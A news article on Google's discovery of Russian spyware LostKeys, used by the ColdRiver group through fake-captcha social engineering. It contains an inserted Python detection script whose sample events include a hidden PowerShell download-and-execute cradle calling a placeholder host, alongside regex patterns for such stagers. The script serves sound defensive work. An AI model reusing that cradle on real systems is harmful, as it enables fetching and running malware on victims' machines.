Українська правда

Google discovers new Russian spyware LostKeys linked to FSB

- 11 May, 01:17 AM

Google has announced (via Android Headlines) the discovery of a new Russian spyware called LostKeys, used by the ColdRiver hacking group, which is affiliated with the Russian FSB. The software is designed to steal files and system data from Western organizations.

According to the Google Threat Intelligence Group (GTIG), LostKeys is delivered in ClickFix-style attacks, which rely on social engineering and begin with a fake captcha. Victims are tricked into running malicious PowerShell scripts that open the way for additional malware to be downloaded and executed. The end goal is to install LostKeys, which acts as a digital vacuum cleaner, extracting files, directories, and system information. The hackers also use other malware, including SPICA, to obtain documents.
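The chain described above (a user is talked into running a PowerShell one-liner from an ordinary desktop context, which then fetches the next stage) leaves a recognizable trace in process-creation telemetry. The following is an added detection example, not code from the article or from Google's report: it scores constructed process-creation events for PowerShell launched from an interactive parent together with the download-and-execute flags typical of ClickFix lures. The event field names (`parent`, `image`, `cmdline`), the sample events and the flag list are assumptions for illustration, not a published signature.

```python
import re

# Constructed sample process-creation events (not real telemetry).
# Field names are an assumption; map them from Sysmon Event ID 1 or an EDR feed.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (iwr http://example.invalid/c)"'},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell -enc SQBFAFgA..."},
]

# Parents from which a user-pasted one-liner (Run dialog, browser, HTA lure)
# would typically spawn PowerShell. Assumed list, extend to fit your estate.
INTERACTIVE_PARENTS = {"explorer.exe", "mshta.exe", "msedge.exe", "chrome.exe"}

# Command-line traits that together indicate a fetch-and-execute stager.
SUSPICIOUS_FLAGS = [
    r"-w(indowstyle)?\s+hidden",                     # hide the console window
    r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}",   # base64-encoded command
    r"-ep\s+bypass|-executionpolicy\s+bypass",       # disable script policy
    r"\biex\b|invoke-expression",                    # execute fetched text
    r"\biwr\b|invoke-webrequest|downloadstring",     # fetch from the network
]


def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    if ev["image"].lower() == "powershell.exe" and ev["parent"].lower() in INTERACTIVE_PARENTS:
        score += 1
        reasons.append("powershell spawned from interactive parent " + ev["parent"])
    for pattern in SUSPICIOUS_FLAGS:
        if re.search(pattern, ev["cmdline"], re.IGNORECASE):
            score += 1
            reasons.append("cmdline matches " + pattern)
    return score, reasons


def flag_events(events, threshold=2):
    """Return the events whose score reaches the threshold, with their reasons."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((ev, score, reasons))
    return flagged


if __name__ == "__main__":
    for ev, score, reasons in flag_events(SAMPLE_EVENTS):
        print(f"[score {score}] {ev['parent']} -> {ev['cmdline']}")
        for r in reasons:
            print("    ", r)
```

The threshold of 2 is deliberate: a bare PowerShell launched from Explorer (event 3) is routine administrator behaviour and scores only 1, while the encoded command from an HTA parent (event 4) and the hidden, policy-bypassing download cradle (event 1) both cross it. Tune the parent list and flag patterns against a week of your own telemetry before alerting on this in production.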

The ColdRiver group has been active since 2017 and is known by other names such as Star Blizzard and Callisto Group. It has reportedly become more active in recent years, especially since the beginning of Russia’s invasion of Ukraine. The group specializes in cyber espionage, targeting government and defense institutions, think tanks, politicians, journalists, and non-governmental organizations.

The US has already imposed sanctions on individual members of the group and announced a $10 million reward for information leading to their arrest.

Google experts emphasize the need to strengthen cybersecurity, especially for organizations that could become potential victims of ColdRiver attacks. They recommend using Google's Advanced Protection, as well as regularly updating security systems to prevent such threats.
